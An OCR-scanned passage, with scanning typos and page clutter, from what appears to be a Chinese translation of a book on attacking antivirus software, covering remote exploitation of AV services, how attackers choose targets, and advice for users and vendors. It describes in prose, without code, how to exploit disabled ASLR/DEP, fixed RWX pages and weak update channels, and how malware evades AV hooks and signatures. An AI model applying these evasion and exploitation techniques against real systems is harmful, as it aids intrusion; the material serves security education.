口 漏洞 利用 缓解 技术 ”所 有 漏洞 利用 缓解 技术 都 会 让 漏洞 利用 相关 过 程 更 加 困难 。 
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OQ 错误 ” 反 病 毒 引 警 会 犯 很 多 错误 ， 比 如 之 前 探讨 的 与 客户 端 漏洞 利用 有 关 的 错误 : 禁 
ASLR 和 DEP、 在 固定 地 址 创建 RWX 内 存 页 面 ， 等 等 。 对 攻击 者 来 说 幸运 的 是 ， 反 病毒 软 
件 犯 的 此 类 错误 可 以 减轻 漏洞 利用 缓解 技术 设置 的 困难 。 
也 许 对 攻击 者 来 说 最 大 的 差别 是 , 服务 器 端 没 有 提供 用 于 创建 payload 的 编程 接口 。 这 就 意味 
着 ， 如 果 想 要 利用 一 些 反 病毒 软件 特定 网 络 服务 的 漏洞 ， 我 们 就 无 法 使 用 JavaScript 或 Intelx86 创 
建 payload， 也 就 无 法 进行 堆 喷 了 。 但 是 , 好 消息 是 , 与 客户 端 漏洞 利用 一 样 ， 利 用 反 病 毒 网 络 服 
务 或 更 新 服务 的 漏洞 〈 或 者 你 和 希望 利用 的 任何 服务 器 端 漏洞 )， 并 不 像 利 用 OpenSSH、Apache 或 
Microsoft Windows Update 那 样 困 难 。 确 实 ， 该 过 程 和 客户 端 部 分 漏洞 利用 没什么 差别 : 事实 上 ， 
相 比 针对 广泛 使 用 、 有 更 强 安全 意识 的 服务 器 软件 发 起 攻击 , 针对 反 病 毒 软件 服务 开展 攻击 会 更 
容易 一 些 。 
还 有 一 点 很 大 的 不 同 : 对 于 网 络 服务 来 说 , 我 们 可 能 只 有 一 次 尝试 成 功 的 机 会 。 我 们 只 有 一 
次 机 会 攻击 网 络 服务 ， 如 果 失 败 ， 就 只 能 等 待 直到 相关 服务 重启 。 如 果 服 务 会 自动 重启 ， 我 们 就 
可 以 尝试 很 多 次 , 但 并 不 建议 你 这 么 做 : 不 断 尝试 让 服务 崩 演 和 重启 ， 有 点 类 似 于 暴力 破解 。 这 
一 过 程 中 会 生成 大 量 的 告警 日 志 ， 最 终 会 引起 系统 管理 员 和 安全 工程 师 的 注意 。 


15.2.2 ”利用 ASLR、DEP 和 地 址 固定 的 RWX 内 存 页 面相 关 漏 洞 


之 前 我 们 已 经 探讨 过 在 客户 端 ， 如 果 反 病 毒 产品 的 茶 一 个 或 多 个 模块 禁用 了 DEP 或 ASLR， 
如 何 利用 这 样 的 缺陷 。 对 服务 右 端 的 漏洞 利用 来 说 ， 也 是 同样 的 道理 。 
口 如 果 反 病毒 软件 禁用 了 DEP， 且 漏洞 可 以 重 写 栈 ， 我 们 甚至 可 以 执行 栈 上 的 代码 。 
口 如 果 你 需要 一 个 带 有 本 机 代码 的 固定 地 址 来 创建 带 ROP 组 件 的 payload， 我 们 就 可 以 利用 
反 病 毒 软件 中 没有 启用 ASLR 的 、 存 在 漏洞 的 模块 来 发 起 攻击 。 
O 如 果 需 要 内 存 空 间 写 人 shellcode, 可 以 使 用 反 病 毒 软 件 在 固定 地 址 创建 的 RWX 内 存 页 面 。 
所 以 在 这 里 客户 端 和 服务 器 端的 漏洞 利用 没有 本 质 上 的 区 别 。 





















































15.3 总结 


当 攻 击 者 无 法 直接 在 本 地 接触 目标 计算 机 的 时 候 , 可 以 利用 远程 漏洞 。 远 程 利用 反 病 毒 产品 
客户 端 漏洞 的 一 个 例子 是 , 攻击 者 向 目标 机 器 发 送 一 封 恶意 邮件 , 该 邮件 会 触发 反 病 毒 软件 的 漏 
洞 ， 进 而 成 功 实施 DoS 攻 击 或 远程 代码 执行 。 另 一 方面 ， 远 程 利用 反 病 毒 软件 服务 器 端的 漏洞 ， 
涉及 攻击 暴露 在 LAN 或 WAN 中 的 邮件 网 关 、 防 火 墙 或 反 病 毒 软 件 的 其 他 服务 器 和 服务 。 

反 病 毒 软件 的 客户 端 模 块 会 受到 操作 系统 、 编 译 器 和 定制 的 沙 盒 提 供 的 对 抗 漏洞 利用 技术 保 
护 ， 比 如 ASLR、DEP、SafeSEH、 控 制 流 保 护 ( Control Flow Guard )、 安 全 Cookie 等 。 
尽管 有 很 多 对 抗 漏洞 被 利用 的 技术 ,但 是 由 于 反 病 毒 软件 的 开发 者 们 缺乏 安全 的 开发 意识 和 
设计 规范 ,仍然 会 导致 漏洞 被 攻击 者 成 功利 用 。 以 下 是 一 些 可 以 导致 漏洞 和 安全 问题 的 常见 小 错误 : 

口 对 一 个 或 多 个 模块 没有 启用 ASLR， 或 向 系统 内 的 其 他 进程 全 局 注入 没有 启用 ASLR 的 库 

文件 ; 
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250 — $153 远程 漏洞 





了 DEP; 
口 使 用 带 RWX(Read-Write-eXecute ) 属性 





的 内 存 页 , 尤其 是 创建 内 存 位 置 





O 为 了 能 够 在 栈 上 执行 代码 ， 或 为 了 保证 反 病 毒 软件 中 的 旧 模 块 能 够 正常 工作 ， 故 意 禁 


固定 的 RWX 页 面 。 








除了 借助 反 病 毒 软件 在 使 用 漏洞 利用 防护 技术 的 过 程 中 出 现 的 错误 , 攻击 者 还 会 利用 反 病 毒 
软件 中 的 一 些 功能 特性 来 进行 攻击 。 比 如 ,如 果 反 病毒 软件 带 有 模拟 器 ， 就 可 以 利用 其 中 的 缺陷 
来 进行 堆 喷 或 泄漏 内 存 并 发 起 可 以 导致 反 病 毒 软件 骨 溃 的 DoS 攻 击 。 

反 病 毒 软件 服务 器 端的 模块 和 其 他 网 络 服务 也 会 采用 上 面 提 到 的 客户 端 使 用 的 相关 漏洞 利 
用 防护 技术 ， 当 然 也 会 因为 使 用 了 这 些 技术 而 存在 与 客户 端 模块 相同 的 缺陷 。 但 是 ,服务器 端 模 





块 还 容易 受到 以 下 类 型 的 攻击 : 
口 更 新 服务 需 易 受 ARP 伪 造 攻击 ; 








算法 而 不 是 基于 PKI 的 签名 校 验 技 术 ; 
口 错误 使 用 安全 传输 通道 ， 比 如 使 用 HTT 


















































P 而 不 是 HTTPS。 


a 在 传输 更 新 文件 的 过 程 中 ， 错 误 使 用 文件 签名 和 完整 性 校 验 技术 ， 比 如 使 用 CRC32 校 验 


上 面 的 最 后 两 点 在 本 书 对 DrWeb 中 漏洞 利用 的 实战 介绍 中 有 了 很 好 的 诠释 。 











曹 是 第 三 部 分 的 结尾 。 在 接 下 来 的 也 就 是 最 后 一 部 分 中 , 技术 性 的 知识 会 比较 少 ， 下 面 两 
草 会 重点 探讨 反 病毒 防护 目前 的 趋势 , 以 及 反 病 毒 行业 的 发 展 方向 。 本 书 最 后 会 给 出 反 病 毒 软件 


的 改进 建议 。 











第 加 部 分 


当 醒 趋势 与 建议 


> 第 16 章 当前 反 病 毒 防 护 趋 热 
> 第 17 章 一 些 建议 和 未 来 展望 


当前 反 病 毒 防护 趋势 








反 病 毒 产品 所 提供 保护 的 稳定 性 和 有 效 性 不 仅 由 其 本 身 质 量 决 定 ， 同 时 也 受 目 标 用 户 的 
影响 。 

如 今 , 每 一 位 计算 机 用 户 都 面临 着 恶意 软件 的 威胁 。 但是, 这 也 不 是 说 邻 家 超市 的 老板 会 成 
为 攻击 者 使 用 零 日 漏洞 的 攻击 目标 。 事 实 上 , 政府 机 构 或 大 型 企业 往往 会 成 为 世界 上 许多 恶意 软 
件 编写 者 的 攻击 目标 ,不论 攻 击 者 是 脚本 小 子 还 是 有 相关 背景 的 专业 黑客 。 几 乎 每 周 ,我 们 都 可 
以 读 到 关于 美国 国家 安全 局 、 英 国政 府 通信 总 部 或 其 他 安全 情报 机 构 针 对 电信 公司 、ISP 和 其 他 
大 公司 开展 攻击 的 报道 。 这 类 被 攻击 的 公司 有 本 国 公司 也 有 外 国 公司 , 情报 机 构 攻 击 这 些 公司 有 
助 于 监控 某 些 组 织 、 个 人 以 及 武装 组 织 等 。 

反 病 毒 软件 的 目标 受众 可 以 分 为 三 大 主要 团体 : 家 庭 个 人 用 户 、 中 小 型 企业 用 户 、 政 府 机 构 
和 大 型 公司 。 

本 章 将 探讨 当前 反 病 毒 防护 趋势 , 以 及 反 病 毒 公司 针对 几 大 主要 客户 群体 提供 的 防护 级 别 和 
每 个 用 户 群 的 相关 注意 事项 。 


16.1 匹配 攻击 技术 与 目标 


本 书 前 面 介绍 并 探讨 了 针对 安装 有 某 些 反 病 毒 产 品 的 计算 机 的 多 种 技术 、 缺 陷 、 攻 击 方式 、 
潜在 漏洞 和 已 公开 的 漏洞 利用 程序 。 这 些 技 术 和 方法 的 复杂 度 、 成 本 以 及 转化 为 产品 用 于 实战 的 
时 间 各 异 。 因 此 ， 需 要 有 一 个 针对 特定 攻击 目标 选取 合适 攻击 技术 的 度量 衡 。 

接 下 来 将 会 冰释 在 选择 针对 哪个 目标 使 用 哪 种 攻击 技术 时 ,需要 考量 的 各 种 因素 。 


16.1.1 多 种 多 样 的 反 病 毒 产品 


如 今 市 场 上 充斥 着 各 类 反 病 毒 软件 ， 因 此 不 可 能 使 用 一 种 攻击 技术 覆盖 到 所 有 计算 机 用 户 。 
反 病 毒 产 品种 类 十 分 庞大 ,如 果 能 够 成 功 攻击 市 场 上 最 主流 的 反 病 毒 软件 , 就 意味 着 可 以 影响 到 
20% 的 用 户 了 。 

由 于 反 病 毒 产品 的 多 样 性 ， 将 反 病 毒 套装 作为 攻击 目标 并 不 划算 。 因 此 ， 将 产品 种 类 较 少 、 
但 是 广泛 使 用 的 软件 作为 漏洞 利用 攻击 目标 更 佳 ， 比 如 浏览 器 (Firefox, Internet Explorer 等 ) 和 
Office 套 装 ( Microsoft Office, Apache OpenOffice 等 )。 接 下 来 会 阐释 不 同 的 攻击 种 类 及 其 目标 。 































































































16.] 匹配 攻击 技术 与 目标 253 





1. 零 日 漏洞 

零 日 漏洞 是 指 可 以 用 于 攻破 系统 的 、 尚 未 公开 或 修复 的 漏洞 。 这 类 漏洞 的 危害 十 分 巨大 ， 需 
要 耗费 大 量 的 精力 和 时 间 去 挖掘 。 可 以 说 零 日 漏洞 是 互联 网 犯罪 武 融 。 

正 是 因为 这 样 的 原因 , 消耗 一 个 零 日 漏洞 针对 无 足 轻 重 的 用 户 展开 攻击 对 于 攻击 者 来 说 并 不 
明智 。 这 样 的 做 法 还 有 可 能 导致 使 用 零 日 漏洞 的 恶意 软件 样本 被 反 病 毒 厂 商 或 病毒 研究 者 捕获 ， 
从 而 被 剖析 研究 。 这 也 就 意味 着 ， 零 日 漏洞 会 在 短 时 间 内 被 修复 ， 从 而 失效 。 

针对 无 足 轻 重 的 用 户 使 用 零 日 漏洞 开展 攻击 ， 就 好 比 用 高 射 炮 打 蚊子 。 

从 2014 年 到 现在 , 我 们 能 经 常 听 到 使 用 最 新 的 零 日 漏洞 针对 大 众 开 展 攻击 的 案例 吗 ? 好像 很 
少 吧 ! 攻击 者 一 般 并 不 会 浪费 零 日 漏洞 这 种 宝贵 的 资源 。 他 们 会 保存 零 日 漏洞 利用 攻击 程序 (如 
果 有 的 话 )， 直 到 遇 到 可 以 带 来 高 回报 的 受害 者 。 

2. 被 修复 的 漏洞 

不 正确 地 使 用 零 日 漏洞 会 让 样本 被 捕获 , 最 终 导致 漏洞 失效 。 攻击 者 可 以 转 而 使 用 已 经 被 修 
复 的 稍 旧 漏洞 ， 因 为 总 是 会 有 计算 机 用 户 没 有 及 时 修补 最 新 的 安全 补丁 。 

黑市 上 出 售 的 大 多 数 漏洞 利用 攻击 套 组 甚至 不 会 包含 一 个 零 日 漏洞 利用 攻击 程序 , 而 是 使 用 
一 些 最 近 或 几 年 前 刚 被 修复 的 漏洞 。 在 Metasploit 里 常 能 发 现 被 修复 或 被 改变 用 途 的 漏洞 利用 攻 
击 程序 。 此 外 , 在 感染 大 量 家 庭 计算 机 用 户 的 攻击 中 , 也 常常 会 采用 此 类 漏洞 利用 攻击 程序 。 事 
实 上 ， 这 种 攻击 方法 比 使 用 真实 的 零 日 漏洞 开展 攻击 厉害 得 多 。 



































c 


























16.1.2 ”针对 家 庭 用 户 


事实 上 , 家 庭 用 户 无 须 过 多 担心 前 文中 提 到 的 零 日 漏洞 攻击 。 当 攻击 者 想 要 尽 可 能 多 地 感染 
家 庭 用 户 时 , 一 般 不 会 过 多 考虑 使 用 多 么 高 级 的 技术 , 而 是 会 关注 如 何 使 用 最 简单 的 技术 来 最 快 
感染 大 量 的 家 庭 个 人 计算 机 用 户 。 

攻击 者 会 针对 家 庭 个 人 计算 机 用 户 ( 比如, 我 们 母亲 或 祖母 的 电脑 ) 开展 攻击 的 原因 有 很 多 

种 ,但 是 他 们 的 主要 动机 在 大 多 数 情况 下 是 一 致 的 : 赚钱 。 以 下 是 攻击 者 可 以 从 攻击 个 人 家 庭 用 

户 带 来 的 利益 。 

O 通过 感染 个 人 家 庭 用 户 电脑 ， 窃 取 银 行 信息 或 其 他 可 以 直接 接触 用 户 资金 账户 的 数据 ， 

比如 PayPal 或 Amazon 等 账户 信息 。 

O 通过 感染 个 人 家 庭 用 户 组 件 僵 尸 网 络 ， 进 行 分 布 式 拒绝 服务 攻击 、 发 送 垃圾 邮件 、 控 掘 

比特 币 等 。 

口 通过 加 密 被 感染 用 户 电 脑 上 的 文档 、 图 像 和 其 他 信息 ， 来 勒索 用 户 支 付 相应 赎金 。 

a 借助 社会 工程 学 攻击 的 手段 ， 攻 击 者 可 以 欺骗 用 户 安装 假 的 反 病 毒 套装 。 假 的 反 病 毒 软 
件 会 向 用 户 发 出 多 条 虚假 的 病毒 风险 提示 ， 从 而 欺骗 用 户 支 付 购买 完整 版 反 病毒 产品 来 
“修复 ”被 感染 的 系统 。 

在 上 述 攻 击 动机 中 , 没有 一 项 适用 于 某 些 公司 雇佣 攻击 者 通过 恶意 软件 渗透 到 对 手 公 司 窃取 
商业 机 密 和 受 知识 产权 保护 的 商业 信息 。 
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16.1.3 ”针对 中 小 型 公司 


和 家 庭 个 人 用 户 类 似 ， 中 小 型 公司 无 须 过 多 担心 攻击 者 使 用 零 日 漏洞 攻击 他 们 。 比 如 , 一 家 
销售 保险 的 公司 就 不 太 可 能 成 为 使 用 零 日 漏洞 的 攻击 目标 ; 但 是 , 也 不 排除 有 另外 一 家 保险 公司 
和 希望 借 此 来 偷 取 这 家 公司 的 客户 数据 库 。 在 攻击 小 公司 时 , 攻击 者 使 用 的 攻击 手法 与 攻击 家 庭 个 
人 用 户 类 似 : 社会 工程 学 、 漏 洞 利用 攻击 工具 箱 和 已 修复 的 零 日 安全 漏洞 。 

攻击 者 冒 着 零 日 漏洞 外 泄 的 风险 , 使 用 漏洞 攻击 中 小 公司 的 可 能 性 几乎 没有 ; 因为 根本 不 值 
得 这 么 去 做 。 外 国 黑 客 组 织 使 用 零 日 漏洞 来 攻击 一 家 洗车 公司 是 几乎 不 可 能 的 ,因为 洗车 公司 没 
有 什么 有 价值 的 信息 。 

也 正 是 出 于 这 样 的 原因 ， 中 小 型 公司 不 必 担 心 反 病毒 产品 中 存在 的 漏洞 ， 至 少 目前 不 需要 。 
但 是 ， 如 果 通 过 对 反 病 毒 产 品 的 简单 审计 ， 发 现 了 大 量 的 漏洞 ， 就 意味 着 这 款 反 病毒 软件 的 开发 
质量 十 分 糟糕 。 因 此 ， 即 便 无 须 担 心 反 病 毒 产品 中 的 零 日 漏洞 会 被 利用 ,还 是 要 对 安装 在 办 公 电 
脑 上 的 反 病 毒 产 品 粳 糕 的 质量 表示 担忧。 

一 款 漏洞 百出 的 反 病 毒 软件 能 够 提供 良好 的 恶意 软件 防护 、 侦 测 和 感染 文件 修复 的 可 能 性 有 
多 大 呢 ? 


16.2 ”针对 政府 机 构 和 大 型 公司 


尽管 攻击 政府 机 构 和 大 型 公司 需要 更 多 的 复杂 技巧 , 但 是 其 中 的 利益 更 大 。 因 此 政府 机 构 和 
大 型 公司 需要 提防 来 自 世 界 各 地 所 有 可 能 的 攻击 者 。 比 如 , 没有 特定 攻击 目标 、 大 范围 的 恶意 软 
件 攻击 ， 不 仅 会 对 家 庭 个 人 用 户 造成 影响 ， 同 样 会 对 政府 机 构 和 大 型 公司 的 计算 机 造成 影响 。 

政府 机 构 和 大 型 公司 确实 需要 担心 攻击 者 不 择 手段 地 使 用 零 日 漏洞 进行 攻击 , 因为 他 们 经 常 
成 为 国外 政府 机 构 和 公司 的 渗透 目标 。 比 如 , 汽车 生产 商 需要 担心 来 自 对 手 的 商业 间谍 行为 吗 ? 
答案 是 肯定 的 。 同 样 ， 制 药 公 司 、 电 影 制作 公 司 、 图 书 出 版 商 ， 甚 至 武器 制造 商 、 核 电站 等 颇 有 
吸引 力 的 企业 也 十 分 容易 成 为 攻击 目标 。 

上 面 提 到 的 这 些 组 织 企 业 确实 应 该 要 对 针对 实际 生产 环境 中 所 使 用 反 病 毒 软 件 的 漏洞 利用 
攻击 保持 警惕 。 以 下 是 理论 上 可 能 出 现 的 攻击 场景 : 

(1) 组 织 A 想 从 组 织 B 窃 取 相 关 数 据 ; 

(2) 攻击 目标 组 织 B 制 订 了 严密 的 安全 防护 方案 ， 组 织 内 的 所 有 计算 机 都 安装 上 了 反 病 毒 软 
件 ， 所 有 内 网 流量 都 会 经 过 反 病 毒 软件 的 检查 ; 

(3) 攻击 者 A 向 组 织 B 的 邮件 网 关 服 务 器 发 送 一 封 电子 邮件 ， 其 中 带 有 对 应 反 病 毒 软件 的 漏洞 
利用 攻击 程序 ; 

(4) 大 功 告 成 ， 组 织 A 可 以 控制 组 织 B 的 内 部 计算 机 了 。 

事情 可 能 比 想象 的 还 要 糟糕, 如 果 针 对 反 病 毒 软 件 的 漏洞 利用 攻击 程序 向 对 应 反 病 毒 软 件 注 
人 了 恶意 内 容 呢 ?” 比 如， 如 果 攻 击 者 A 在 目标 机 器 B 上 注入 的 恶意 内 容 执 行 上 下 文 是 反 病毒 软件 
呢 ? 如 果 B 过 分 信任 存在 漏洞 的 已 安装 的 反 病 毒 软件 ， 将 成 为 一 个 大 灾难 。 虽 然 这 只 是 一 个 理论 
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上 假设 的 情况 , 但 是 发 生 的 可 能 性 非常 大 。 也 许 就 在 你 阅读 本 书 的 时 候 , 世界 上 某 个 角落 正在 发 
生 这 样 的 攻击 。 

针对 反 病毒 软件 开展 的 有 大 型 组 织 支 持 的 恶意 攻击 案例 十 分 稀少 ， 不 过 Mask 病 毒 ( 也 称 为 
Careto ) 就 是 其 中 之 一 。 这 项 牵涉 利益 巨大 、 有 大 型 组 织 支 持 的 恶意 攻击 ， 影 响 了 包括 南非 、 北 
欢 、 北 美 以 及 中 东 在 内 的 政府 机 构 ， 持 续 了 至 少 五 年 。 根 据 卡 巴 斯 基 的 报告 ，Mask 病 毒 利用 了 
卡巴 斯 基 反 病毒 软件 的 多 个 漏洞 。 卡 巴 斯 基 没有 披露 关于 此 次 攻击 的 更 多 细节 , 但 这 绝对 是 一 个 
活生生 的 案例 : 用 户 过 分 相信 一 款 反 病毒 产品 ,攻击 者 利用 其 中 的 零 日 漏洞 发 起 攻击 ， 影 响 了 世 
界 上 的 许多 企业 。 



























































16.3 ”总 结 


要 现实 地 对 待 反 病 毒 软件 受到 攻击 的 可 能 性 , 这 一 点 很 重要 。 一 个 拥有 无 限 资 源 的 大 型 公司 
或 政府 机 构 可 以 轻而易举 地 攻破 一 个 价值 50 美 元 的 防护 软件 , 那么 攻破 使 用 广泛 的 反 病毒 防护 套 
装 的 可 能 性 又 有 多 大 呢 ? 在 我 看 来 ， 接 近 100%! 

经 过 对 反 病 毒 产品 为 期 两 年 的 分 析 , 我 发 现 了 存在 于 反 病 毒 产 品 中 的 许多 漏洞 , 所 以 反 病 毒 
产品 被 攻破 的 可 能 性 很 高 。 

也 许 你 会 说 ,商业 组 织 防护 层面 的 反 病 毒 防 护 套装 功能 会 很 强劲 。 确 实 是 这 样 , 但 是 它们 的 
核心 引擎 其 实 是 一 样 的 。 根 据 我 的 研究 经 验 ， 针 对 零售 版 本 的 反 病 毒 软件 的 漏洞 利用 程序 ,在 进 
行 针 对 商业 组 织 版 本 的 漏洞 利用 攻击 过 程 中 , 因为 需要 使 用 不 同 的 ASLR 绕 过 技术 、 不 同 的 路 径 、 
针对 不 同 端口 和 管道 的 监听 方式 等 , 所 以 需要 作出 相关 调整 。 但 是 ,由 于 针对 商业 组 织 的 版 本 和 
桌面 版 使 用 的 内 核 是 相同 的 ， 文 件 格式 解析 器 的 漏洞 在 不 同 的 版 本 中 有 着 相同 的 影响 。 

反 病 毒 产品 目前 提供 的 防护 无 法 有 效 对 抗 使 用 零 日 漏洞 的 攻击 。 有 时 安装 反 病 毒 软件 甚至 会 
使 电脑 变 得 更 加 不 安全 , 因为 反 病毒 软件 的 安装 给 电脑 带 来 了 新 的 攻击 面 和 可 以 被 本 地 或 远程 利 
用 的 潜在 漏洞 。 

一 些 反 病毒 厂商 对 自身 产品 的 安全 性 毫 不 在 乎 ， 因 为 他 们 认为 普通 用 户 对 此 没有 足够 的 认 
知 。 反 病毒 软件 的 自我 保护 是 反 病毒 软件 可 以 采取 的 用 于 防止 相关 反 病 毒 进程 和 服务 被 恶意 软件 
终止 的 最 基本 措施 ， 不 过 也 有 一 些 例外 : 有 些 反 病毒 厂商 只 会 关心 市 场 营销 。 

虽然 将 来 这 种 情况 可 能 会 得 到 改善 , 但 是 目前 来 看 情况 不 容 乐 观 。 下 一 章 将 会 探讨 未 来 可 加 
入 的 相关 改进 措施 ， 事 实 上 已 经 有 一 些 反 病 毒 软件 正在 这 么 做 了 。 































































































一 些 建议 和 未 来 展望 











当前 大 多 数 反 病毒 产品 提供 的 安全 防护 和 用 户 的 预期 效果 相差 其 远 。 本 章 将 探讨 一 些 反 病毒 
厂商 可 以 用 于 提升 产品 能 力 的 优化 策略 。 

本 章 将 为 我 们 提供 一 些 关 于 改善 反 病 毒 产品 质量 及 其 防护 能 力 的 思路 。 此 外 , 我 们 还 会 了 解 
到 对 于 反 病 毒 产品 应 该 有 哪些 期 待 , 同时 又 不 应 该 有 哪些 期 待 。 接 下 来 看 一 些 针对 大 多 数 反 病 毒 
软件 的 通用 建议 。 


17.1 给 反 病 毒 软件 用 户 的 建议 


对 大 多 数 用 户 来 说 ， 反 病毒 产品 和 安全 之 间 似 乎 可 以 划 等 号 ， 但 是 这 种 想法 并 不 完全 准确 。 
本 节 将 会 介绍 解释 一 些 常 见 误区 , 并 给 反 病毒 产品 的 用 户 一 些 建议 , 尤其 是 那些 最 需要 注意 防范 
安全 类 产品 漏洞 的 用 户 : 大 公司 和 政府 机 构 。 同 时 ， 这 些 建议 对 其 他 类 型 的 用 户 同样 有 意义 。 



































17.1.1 盲目 信任 是 错误 的 


育 目 信任 反 病 毒 软件 提供 的 安全 防护 是 大 多 数 人 常 犯 的 错误 ,我 们 常常 会 在 一 些 论坛 上 看 到 
类 似 “ 我 的 电脑 中 毒 了 。 怎 么 会 呢 ? 我 明明 安装 杀毒 软件 了 !” 这 样 的 论调 。 
在 我 们 完全 信任 反 病 毒 软件 之 前 ， 应 该 考虑 以 下 几 点 。 

口 反 病 毒 产品 不 能 防护 用 户 造 成 的 错误 ， 即 反 病 毒 产 品 无 法 防护 使 用 社会 工程 学 策略 针对 

用 户 发 起 的 攻击 。 因 此 ， 用 户 需要 有 基本 的 安全 意识 。 

O 反 病 毒 产 品 并 不 是 完美 无 瑕 的 ; 和 电脑 上 的 其 他 软件 一 样 ， 它 们 也 会 有 漏洞 和 缺陷。 

口 反 病毒 产品 基于 已 支持 的 特征 码 、 启 发 式 引 擎 和 动静 态 分 析 技 术 侦 测 威胁 。 除 非 未 知 病 
毒 或 新 型 威胁 的 相关 特征 (行为 或 静态 提取 的 相关 特征 ) 已 知 ， 否 则 反 病 毒 软件 无 法 侦 
测 。 

口 病毒 开发 和 质量 保证 ( QA ) 的 关键 部 分 就 是 绕 过 所 有 或 大 多 数 反 病毒 产品 。 总 的 来 说 ， 
实现 这 一 目的 并 不 是 特别 困难 ， 合 法 或 非法 的 恶意 软件 都 可 以 实现 类 似 的 功能 〈 比如 
FinFisher )。 

口 和 其 他 所 有 软件 一 样 ， 反 病毒 软件 的 漏洞 同样 可 以 被 利用 攻击 。 

口 与 办 公 软 件 和 浏览 器 相 比 ， 安 全 类 产品 的 漏洞 更 容易 被 利用 。 
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O 据 披 露 ， 最 起 码 有 一 家 反 病 毒 厂 商 (卡巴 斯 基 ) 遭 到 有 关 政府 机 构 支 持 的 攻击 影响 : 反 

病毒 厂商 的 产品 无 法 防御 此 类 攻击 。 

没有 相关 计算 机 知识 的 电脑 用 户 常常 认为 安装 了 反 病 毒 软件 以 后 就 万 事 大 吉 了 。 他 们 觉得 
安装 完 反 病毒 软件 以 后 就 可 以 将 其 抛 在 脑 后 ， 因 为 反 病毒 软件 会 帮 他 们 打 理 所 有 与 安全 有 关 的 
事务 。 这 类 错误 的 思路 又 会 被 反 病 毒 产品 的 营销 手段 加 以 强人 化。 类似“ 安装 反 病 毒 软件 就 可 以 
高 枕 无 忧 ”的 口号 十 分 常见 ， 但 事实 是 ， 这 类 口号 根本 不 是 真 的 ， 而 且 对 真正 的 安全 造成 了 严 
峻 的 挑战 。 

由 于 缺乏 安全 意识 ,或 是 中 了 社会 工程 学 攻击 的 招 , 用 户 有 时 会 禁用 反 病 毒 软 件 , 来 运行 安 
装 从 网 站 下 载 或 者 通过 邮件 接收 的 应 用 。 尽 管 这 听 起 来 不 是 很 常见 , 但 的 确 是 反 病 毒 软 件 用 户 计 
算 机 被 感染 的 主要 途径 之 一 。 我 们 经 常 可 以 从 反 病 毒 软件 技术 支持 工程 师 那里 听 到 一 些 令 人 典 笑 
不 得 的 相关 案例 。 
恶意 软件 通常 会 借助 社会 工程 学 攻击 技巧 : 提示 用 户 禁 用 反 病 毒 软件 , 否则 将 会 干扰 安装 过 
程 。 恶 意 软件 也 会 直接 向 用 户 申 请 获得 最 高 权限 。 如 果 用 户 在 Windows 系 统 中 的 用 户 账户 控制 
(UAC ) 提示 框 中 点 击 “ 是 ”， 亚 意 软件 就 会 禁用 反 病 毒 软 件 ， 然 后 开始 肆意 破坏 。 许 多 成 功 进行 
攻击 的 恶意 软件 通常 会 在 带 有 恶意 附件 文档、 图片 或 可 执行 文件 形式 ) 的 邮件 中 借助 文字 提示 
诱 使 用 户 禁 用 反 病 毒 软件 。 虽 然 听 起 来 像 是 无 稽 之 谈 ， 但 这 种 办 法 确实 有 效 。 

许多 用 户 至 今 坚信 , 反 病 毒 软 件 可 以 洞悉 每 一 个 恶意 软件 和 它们 的 一 切 行为 。 但 是 ， 反 病毒 
软件 并 不 是 完美 的 防护 盾 。 反 病毒 软件 中 的 漏洞 允许 一 些 恶意 软件 绕 过 反 病 毒 软件 的 实时 防护 ， 
使 其 能 够 在 系统 中 肆意 破坏 。 比 如 , 反 病 毒 软 件 中 的 零 日 漏洞 或 当前 操作 系统 中 的 零 日 漏洞 可 以 
被 恶意 软件 在 内 核 态 利用 ， 执 行 其 预期 的 恶意 行为 。 

我 们 需要 知道 , 在 反 病毒 防护 和 侦 测 技术 更 新 与 病毒 快速 变种 并 使 用 新 型 感染 和 绕 过 技术 的 
对 抗 中 , 恶意 软件 一 直 处 于 上 风 。 因此 , 直到 相关 病毒 样本 被 截获 并 发 送 至 反 病毒 厂商 分 析 为 止 ， 
反 病 毒 软件 可 能 对 病毒 变种 使 用 的 新 技术 一 无 所 知 ， 无 法 侦 测 。 

反 病 毒 软件 只 能 防御 已 知 的 威胁 。 新 病毒 ， 甚 至 是 旧病 毒 ， 都 可 以 通过 简单 变形 其 相关 代码 
内 容 , 绕 过 一 款 或 多 球 反 病毒 软件 的 基于 静态 特征 码 的 侦 测 。 比 如 ,恶意 软 件 编 写 者 可 以 通过 新 
的 文件 壳 或 可 执行 文件 封装 工具 来 绕 过 反 病 毒 软件 的 侦 测 ,使 用 可 执行 文件 封装 工具 来 处 理 恶 意 
软件 ， 变 更 其 结构 层次 ,同时 保持 内 部 逻辑 不 变 ， 以便 其 能 绕 过 反 病 毒 软件 的 静态 侦 测 ， 并 不 像 
听 起 来 那样 复杂 ， 有 时 甚至 和 打包 恶意 软件 一 样 简单 。 

在 病毒 执行 的 过 程 中 , 反 病 毒 产品 仍然 可 以 通过 动态 分 析 技术 来 侦 测 到 恶意 软件 。 比 如 , 反 
病毒 软件 可 能 会 通过 API hooking 技 术 来 监测 进程 。 如 果 API hooking 是 在 用 户 态 实现 的 话 ， 那 么 
恶意 软件 就 可 以 像 第 9 章 讨 论 的 那样 ， 轻 而 易 举 地 移 除 hook。 如 果 API 监 测 是 在 内 核 态 实现 的 话 ， 
恶意 软件 被 监控 的 行为 可 以 通过 长 时 间 延 公 , 来 让 反 病毒 软件 的 内 核 态 监控 模块 “忘记 ”恶意 软 
件 之 前 的 行为 。 这 种 策略 被 不 少 恶 意 软 件 使 用 , 有 旦 可 以 混淆 基于 行为 的 反 病毒 软件 实时 监控 和 启 
RAIE, 
恶意 软件 也 可 以 通过 进程 内 通信 在 其 内 部 模块 间 分 发 恶意 任务 , 这 样 一 来 就 可 以 摆脱 反 病 毒 
软件 的 行为 监控 3 引擎。 多数 反 病毒 软件 对 于 恶意 软件 的 这 类 操作 一 无 所 知 。 
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还 要 记 住 的 是 ， 恶 意 软件 开发 周期 和 其 他 软件 一 样 。 因 此 ，QA 也 是 开发 高 质量 恶意 软件 的 
重要 一 环 。 比 如 ,黑市 上 售卖 的 恶意 软件 工具 箱 通常 有 一 个 支持 周期 。 在 这 段 时 间 内 ,购买 的 恶 
意 软 件 工具 箱 通 常会 被 更 新 。 这 类 更 新 通常 与 绕 过 反 病 毒 软件 的 侦 测 有 关 。 事 实 上 ,新 开发 的 恶 
意 软 件 根 据 其 质量 的 不 同 ， 会 使 用 市 面 上 常见 的 反 病 毒 软件 进行 尝试 性 的 侦 测 绕 过 测试 。 因 此 ， 
